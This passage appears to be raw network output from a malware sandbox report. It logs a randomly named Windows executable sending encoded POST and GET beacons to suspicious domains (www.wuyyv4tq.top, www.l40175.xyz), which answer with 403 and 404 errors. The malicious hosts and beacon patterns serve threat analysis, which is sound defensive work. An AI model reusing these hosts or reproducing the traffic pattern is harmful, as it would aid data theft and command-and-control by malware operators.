                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 41 69 68 65 4e 53 4b 71 33 76 79 41 59 56 35 7a 32 39 6e 56 61 68 37 72 4c 2f 67 56 6c 4f 55 69 57 7a 31 44 6c 7a 68 6d 76 6f 79 57 7a 5a 75 4a 36 42 39 7a 78 33 62 45 67 7a 7a 48 79 58 78 52 48 31 61 68 6e 73 4d 42 65 71 62 62 36 45 66 4a 79 34 38 33 53 48 59 6a 45 4f 6b 6f 50 43 4c 6c 32 42 51 38 79 55 2b 2f 65 38 58 46 69 42 4c 49 6d 5a 68 2b 58 43 67 35 57 62 49 61 30 66 68 72 63 31 55 63 68 65 43 74 79 46 79 41 50 2f 32 71 61 54 6e 33 69 45 4a 69 32 6a 56 61 66 38 54 7a 4f 39 53 4f 36 42 6d 2f 67 30 64 50 39 75 53 50 46 71 6b 79 43 78 59 4e 76 34 4d 67 7a 48 36 4c 45 57 70 6c 4e 45 32 6b 4b 39 63 52 4c 57 4d 79 6f 67 32 71 46 4d 61 6f 6a 72 70 48
                                                            Data Ascii: glL=AiheNSKq3vyAYV5z29nVah7rL/gVlOUiWz1DlzhmvoyWzZuJ6B9zx3bEgzzHyXxRH1ahnsMBeqbb6EfJy483SHYjEOkoPCLl2BQ8yU+/e8XFiBLImZh+XCg5WbIa0fhrc1UcheCtyFyAP/2qaTn3iEJi2jVaf8TzO9SO6Bm/g0dP9uSPFqkyCxYNv4MgzH6LEWplNE2kK9cRLWMyog2qFMaojrpH
                                                            Dec 16, 2024 22:05:41.692372084 CET691INHTTP/1.1 403 Forbidden
                                                            Server: nginx
                                                            Date: Mon, 16 Dec 2024 21:05:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 548
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            43192.168.2.550017156.226.63.13802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:42.791152954 CET1860OUTPOST /mrxb/ HTTP/1.1
                                                            Host: www.wuyyv4tq.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.wuyyv4tq.top
                                                            Content-Length: 1240
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.wuyyv4tq.top/mrxb/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 41 69 68 65 4e 53 4b 71 33 76 79 41 59 56 35 7a 32 39 6e 56 61 68 37 72 4c 2f 67 56 6c 4f 55 69 57 7a 31 44 6c 7a 68 6d 76 70 6d 57 7a 76 79 4a 36 6d 52 7a 77 33 62 45 2b 6a 7a 47 79 58 78 32 48 31 69 39 6e 73 78 32 65 6f 6a 62 37 6e 58 4a 69 5a 38 33 4a 33 59 6a 62 65 6b 74 42 69 4c 4b 32 42 41 34 79 55 75 2f 65 38 58 46 69 47 7a 49 6b 4c 4a 2b 4d 43 67 2b 52 62 49 73 2f 2f 68 58 63 78 35 70 68 65 47 58 7a 30 53 41 4d 66 6d 71 57 46 54 33 68 6b 4a 73 37 44 55 46 66 38 65 74 4f 35 37 31 36 42 53 46 67 7a 78 50 77 59 66 50 65 72 45 47 58 7a 41 36 73 66 4d 59 68 54 6d 49 50 46 34 51 46 30 57 69 58 2f 4a 39 63 42 38 4c 71 43 33 67 62 36 50 38 7a 38 51 64 4e 78 2f 53 41 6f 5a 38 44 53 30 41 77 39 71 47 6c 5a 69 61 34 43 4e 36 31 61 61 71 79 4e 65 43 77 36 31 74 2b 65 71 4b 4d 56 41 66 4b 45 48 43 62 42 63 79 51 50 75 76 62 6e 6b 42 48 35 30 35 34 51 6c 6b 62 69 52 51 33 49 59 74 7a 69 31 72 59 7a 73 2f 65 63 68 35 6d 7a 4d 62 56 78 72 4c 6b 59 45 67 6f 76 46 66 66 42 66 2f 41 50 6a 36 4f 4f [TRUNCATED]
                                                            Data Ascii: glL=AiheNSKq3vyAYV5z29nVah7rL/gVlOUiWz1DlzhmvpmWzvyJ6mRzw3bE+jzGyXx2H1i9nsx2eojb7nXJiZ83J3YjbektBiLK2BA4yUu/e8XFiGzIkLJ+MCg+RbIs//hXcx5pheGXz0SAMfmqWFT3hkJs7DUFf8etO5716BSFgzxPwYfPerEGXzA6sfMYhTmIPF4QF0WiX/J9cB8LqC3gb6P8z8QdNx/SAoZ8DS0Aw9qGlZia4CN61aaqyNeCw61t+eqKMVAfKEHCbBcyQPuvbnkBH5054QlkbiRQ3IYtzi1rYzs/ech5mzMbVxrLkYEgovFffBf/APj6OOoBtf92orIBRGA0oAG3NujlpHYjuO9v+tC7iPECR+jvWDtrLiDrK+fk/YJb3Eyhx5rnAzQGqMrxav1n5PEFvoruH3wqR1FMbCexTTUyTxwmUBxHbqId4SnrDSNhaBXqaqAXjzcY7nqa4pI+kBFRNHHrRohzbR//N1MGfeUKZIZz5T/wn88TWoE+6Zgdq16Ks/tdjrsvCy7Dve2rxmu4RFvQ4kgjdFRaBX7yMdxtaMDeNC/fCiEgxEh1PS/Y67VK3Lk1z99PFZmkkogEX6App2nPddryhCuAsPRPe0743YPnRiCyw48zft4HrZ8ybx987ZdN6UsXKDbMqsvCM6g2QFkoh1m4J984aDTSaDQcpXzTeM5thRBJjRQZ2WpnyZYVxYu/1Tm46FS0AhRFKIxCAvG4s78Jw6Y2V48N+SZDjSjsC++nvaIW4PUYqCX1ZHhlL2AzS0Zg1sVxCcpxZX3VJ5NlkxJM2wdtAMteJDBz9LX0aBMB4FKxBOxpTBrneFb95CacFM9/XBOSsjr8tEMLqL0vUdtFf02SvJ0zEHwHIYzGqOFc1ZVqL4YqpiyU5P8vTCD8AR59O60uSFLJIcHfs95CBs2tRNUGWerziowb6Vpm7rZe7/lq/P+iQVQ+MijsWAssfmo9HxdWKiFQ/y3h3gNmU78eMv8Oo87N [TRUNCATED]
                                                            Dec 16, 2024 22:05:44.338074923 CET691INHTTP/1.1 403 Forbidden
                                                            Server: nginx
                                                            Date: Mon, 16 Dec 2024 21:05:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 548
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            44192.168.2.550018156.226.63.13802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:45.495820999 CET564OUTGET /mrxb/?UBE=olMPpNEHS&glL=NgJ+OnnL+9OBdVp7mPrYcj/CL8QLoMcpZkBIol5kocXo4N6jyyJX5z7K1FeGxVZdJwTVkN8+aLH/2HPW1qgyNV99doo6LX/75R8r7QWsELDS7SzymadyYj0FRqZ+x5EaLw== HTTP/1.1
                                                            Host: www.wuyyv4tq.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Dec 16, 2024 22:05:47.024296045 CET691INHTTP/1.1 403 Forbidden
                                                            Server: nginx
                                                            Date: Mon, 16 Dec 2024 21:05:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 548
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            45192.168.2.550019162.218.30.235802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:53.252780914 CET817OUTPOST /9wie/ HTTP/1.1
                                                            Host: www.l40175.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.l40175.xyz
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.l40175.xyz/9wie/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 53 57 39 6c 33 46 4b 67 46 42 77 6b 38 62 55 47 2f 6e 47 55 35 4e 5a 6f 63 33 42 68 71 30 73 2b 45 78 70 4a 63 2f 62 42 6d 73 57 4d 73 67 4b 44 47 2b 54 6c 31 71 71 33 4d 48 6f 2f 64 37 62 38 30 42 4a 51 4f 47 35 6c 38 70 77 55 6b 6b 6f 42 72 56 41 65 31 67 69 38 55 6b 6e 76 6c 44 4b 49 45 62 37 51 67 50 6b 51 30 64 2b 38 5a 6b 72 6c 35 2f 32 61 66 63 73 34 68 45 61 54 65 63 74 65 6f 6d 2f 65 55 47 30 35 36 49 4c 6a 76 4e 6e 39 47 52 56 61 47 34 4c 47 48 66 79 78 39 70 34 2f 6f 36 32 2b 43 66 73 65 43 53 65 51 58 57 63 75 34 72 58 37 67 7a 6e 77 50 43 6e 48 76 42 2f 70 61 68 39 6f 2f 41 51 3d
                                                            Data Ascii: glL=SW9l3FKgFBwk8bUG/nGU5NZoc3Bhq0s+ExpJc/bBmsWMsgKDG+Tl1qq3MHo/d7b80BJQOG5l8pwUkkoBrVAe1gi8UknvlDKIEb7QgPkQ0d+8Zkrl5/2afcs4hEaTecteom/eUG056ILjvNn9GRVaG4LGHfyx9p4/o62+CfseCSeQXWcu4rX7gznwPCnHvB/pah9o/AQ=
                                                            Dec 16, 2024 22:05:54.453658104 CET492INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Mon, 16 Dec 2024 21:05:54 GMT
                                                            Connection: close
                                                            Content-Length: 315
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            46192.168.2.550020162.218.30.235802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:55.914433002 CET837OUTPOST /9wie/ HTTP/1.1
                                                            Host: www.l40175.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.l40175.xyz
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.l40175.xyz/9wie/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 53 57 39 6c 33 46 4b 67 46 42 77 6b 38 36 6b 47 39 41 71 55 75 64 5a 70 41 48 42 68 68 55 73 36 45 78 31 4a 63 2b 76 52 6d 61 2b 4d 73 43 53 44 46 2f 54 6c 30 71 71 33 48 6e 6f 36 5a 37 62 42 30 42 46 79 4f 48 31 6c 38 70 6b 55 6b 6d 41 42 72 6d 34 5a 33 77 69 45 63 45 6e 74 34 54 4b 49 45 62 37 51 67 4f 45 70 30 64 32 38 5a 30 37 6c 34 65 32 46 42 4d 73 33 73 55 61 54 61 63 73 32 6f 6d 2f 5a 55 48 70 55 36 4d 37 6a 76 49 44 39 46 46 42 46 49 34 4b 4e 61 50 7a 49 38 70 31 46 76 49 75 79 44 35 35 48 53 6b 75 54 66 41 74 45 69 4a 66 54 7a 54 4c 49 66 52 76 77 2b 78 65 41 41 43 74 59 68 58 48 33 77 4b 7a 72 46 41 50 2f 72 6c 73 77 50 33 48 4a 33 41 72 79
                                                            Data Ascii: glL=SW9l3FKgFBwk86kG9AqUudZpAHBhhUs6Ex1Jc+vRma+MsCSDF/Tl0qq3Hno6Z7bB0BFyOH1l8pkUkmABrm4Z3wiEcEnt4TKIEb7QgOEp0d28Z07l4e2FBMs3sUaTacs2om/ZUHpU6M7jvID9FFBFI4KNaPzI8p1FvIuyD55HSkuTfAtEiJfTzTLIfRvw+xeAACtYhXH3wKzrFAP/rlswP3HJ3Ary
                                                            Dec 16, 2024 22:05:57.123580933 CET492INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Mon, 16 Dec 2024 21:05:56 GMT
                                                            Connection: close
                                                            Content-Length: 315
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            47192.168.2.550021162.218.30.235802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:58.590945005 CET1854OUTPOST /9wie/ HTTP/1.1
                                                            Host: www.l40175.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.l40175.xyz
                                                            Content-Length: 1240
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.l40175.xyz/9wie/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 53 57 39 6c 33 46 4b 67 46 42 77 6b 38 36 6b 47 39 41 71 55 75 64 5a 70 41 48 42 68 68 55 73 36 45 78 31 4a 63 2b 76 52 6d 61 47 4d 73 52 61 44 46 63 4c 6c 7a 71 71 33 45 6e 6f 37 5a 37 62 51 30 42 64 32 4f 48 4a 31 38 74 55 55 72 6c 34 42 6a 33 34 5a 2b 77 69 45 65 45 6e 75 6c 44 4b 64 45 66 6e 4d 67 50 6f 70 30 64 32 38 5a 79 33 6c 34 50 32 46 47 38 73 34 68 45 61 6c 65 63 74 62 6f 6d 58 76 55 45 46 69 36 64 48 6a 68 49 54 39 56 6d 70 46 41 34 4b 50 62 50 7a 35 38 70 35 67 76 49 69 55 44 35 6c 74 53 6a 43 54 50 45 59 6f 6d 34 75 50 78 43 6e 6c 54 42 4b 53 35 6e 4b 2b 66 77 6c 30 6b 57 76 6a 78 37 58 6b 44 47 36 37 72 32 56 34 61 6a 43 54 34 33 54 6d 34 56 43 76 48 33 36 74 38 70 2f 38 49 68 45 6a 4b 63 43 6d 76 67 6f 4c 48 35 6d 46 36 75 42 38 2b 66 67 49 6d 36 45 6f 64 6f 49 46 64 50 6d 66 34 47 30 74 30 32 49 38 53 5a 35 75 33 62 69 42 69 43 5a 2f 66 32 68 6b 54 6c 79 48 52 72 31 48 4e 49 51 70 6f 62 6b 77 4b 37 6e 31 78 35 44 4d 67 4d 6d 70 2b 6c 65 50 49 4e 31 31 58 79 65 55 56 57 [TRUNCATED]
                                                            Data Ascii: glL=SW9l3FKgFBwk86kG9AqUudZpAHBhhUs6Ex1Jc+vRmaGMsRaDFcLlzqq3Eno7Z7bQ0Bd2OHJ18tUUrl4Bj34Z+wiEeEnulDKdEfnMgPop0d28Zy3l4P2FG8s4hEalectbomXvUEFi6dHjhIT9VmpFA4KPbPz58p5gvIiUD5ltSjCTPEYom4uPxCnlTBKS5nK+fwl0kWvjx7XkDG67r2V4ajCT43Tm4VCvH36t8p/8IhEjKcCmvgoLH5mF6uB8+fgIm6EodoIFdPmf4G0t02I8SZ5u3biBiCZ/f2hkTlyHRr1HNIQpobkwK7n1x5DMgMmp+lePIN11XyeUVWDLuUoSEI6i3djdIN/TEFlfng+RXi2mN69LRVai7272xjfGKQMRUVj3ipzwlvws7vHMos5TqwjNO183ThXMwUKQETjHZEfGJi8nD97mzvzYYl5NDXEVpdYHReOHqtjdlYV9M26whjaSbZI86aACT7Wco3eC8to+u+zMuefhAlO5PWcOBA3FU6rGIGJheL9RPaAdIVuen3y9nmTf6N0FMm0nNRLh+5xBGjH82TmsPpuiLQCYIey4D0kizxva+lTG354auXMQw3JgtvG5QpHom2GAydUtW4UOHclF9KZyKtsptNlq6YajcRBuRK5DK4kfwBDpV2vvkLD6IOwxwpnI7AxnxWqbATcFxBr2a2uY0y/4G/sLVfRymzIdphtj68EzA/2/tEUKIFiFF4aOsg2JK3WJrUsVyZlL0fV2R5/L08SecBXvq/rnppHr9DhvUhZAdRvDUCkJJG+nF+AJ2v1EYy7ZhBTKECqoGdvZLYrIlO4X868qal6Qd0t+rTSJniqUCACpNU+GV5XpBcQx5pcVuv7JH02ekaagALW9UXzgQTGDbFuGHNM+iuTJXUbaGLIF3HE8OdHHlaufAGXgDmaznGCa5eiNK4WxEYFUiffEyifXZwoBuh5RXARIc1tK8FfmYZP0Dd3+fiooh+2+FKXs94YTMl/5EQlrLekC [TRUNCATED]
                                                            Dec 16, 2024 22:05:59.807454109 CET492INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Mon, 16 Dec 2024 21:05:59 GMT
                                                            Connection: close
                                                            Content-Length: 315
